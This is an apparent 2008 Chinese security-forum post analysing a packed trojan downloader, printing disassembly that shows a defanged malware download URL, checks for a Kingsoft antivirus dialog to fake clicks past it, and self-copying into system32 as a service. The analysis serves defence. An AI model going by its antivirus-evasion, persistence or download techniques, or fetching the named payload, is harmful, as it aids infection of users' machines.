标题:
一百层壳加不死,就为这么一个东西?
[打印本页]
作者:
点饭的百度空间
时间:
2008-4-10 11:56
标题:
一百层壳加不死,就为这么一个东西?
00405670 . 68 74 74 70 3A 2>ascii "hxxp://123.wwwwo"
00405680 . 6F 6C 2E 63 6E 2>ascii "ol.cn/last.exe",0
????????????????
下载完毕后保存到c:盘根目录下执行,哎,有是很多层
00407627 FF15 2CB14000 call dword ptr ds:[40B12C] ; USER32.GetWindowTextA
0040762D 8D85 F8FDFFFF lea eax,dword ptr ss:[ebp-208]
00407633 68 98DB4100 push last_unp.0041DB98 ; ASCII "#32770"
00407638 50 push eax
00407639 E8 602B0000 call last_unp.0040A19E ; jmp to MSVCRT.strstr
0040763E 8B35 30B14000 mov esi,dword ptr ds:[40B130] ; USER32.PostMessageA
00407644 59 pop ecx
00407645 85C0 test eax,eax
00407647 59 pop ecx
00407648 74 17 je short last_unp.00407661
0040764A 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
00407650 68 20DF4100 push last_unp.0041DF20
00407655 50 push eax
00407656 E8 3D2B0000 call last_unp.0040A198 ; jmp to MSVCRT.strcmp
0040765B 59 pop ecx
0040765C 85C0 test eax,eax
0040765E 59 pop ecx
0040765F 74 17 je short last_unp.00407678
00407661 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
00407667 68 8CDB4100 push last_unp.0041DB8C ; ASCII "KAVStart"
0040766C 50 push eax
0040766D E8 2C2B0000 call last_unp.0040A19E ; jmp to MSVCRT.strstr
//模拟点击试图过金山
0040970C 68 BCDB4100 push last_unp.0041DBBC ; ASCII " -k"
00409711 50 push eax
00409712 FF15 9CB04000 call dword ptr ds:[40B09C] ; kernel32.lstrcatA
00409718 6A 01 push 1
0040971A 68 B80B0000 push 0BB8
0040971F 8D85 E4FBFFFF lea eax,dword ptr ss:[ebp-41C]
00409725 68 1CDE4100 push last_unp.0041DE1C ; ASCII "91E002E4"
0040972A 50 push eax
0040972B BE 10D64100 mov esi,last_unp.0041D610 ; ASCII "523371FD"
00409730 68 10D54100 push last_unp.0041D510 ; ASCII "523371FD"
00409735 56 push esi
00409736 E8 9D030000 call last_unp.00409AD8
0012FAEC 0012FB08 ASCII "C:\windows\system32\6B99EA3C.EXE -k"
//自拷贝
创建一个同名服务,吐一个同名dll,加载后提权、注入、下载、放auto,貌似av终结者~~
BY:unknown tycoon
木马名称:Trojan-Downloader.Win32.Agent.rpi
http://hi.baidu.com/micropoint/b ... 9dbd0b7bec2cba.html
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn
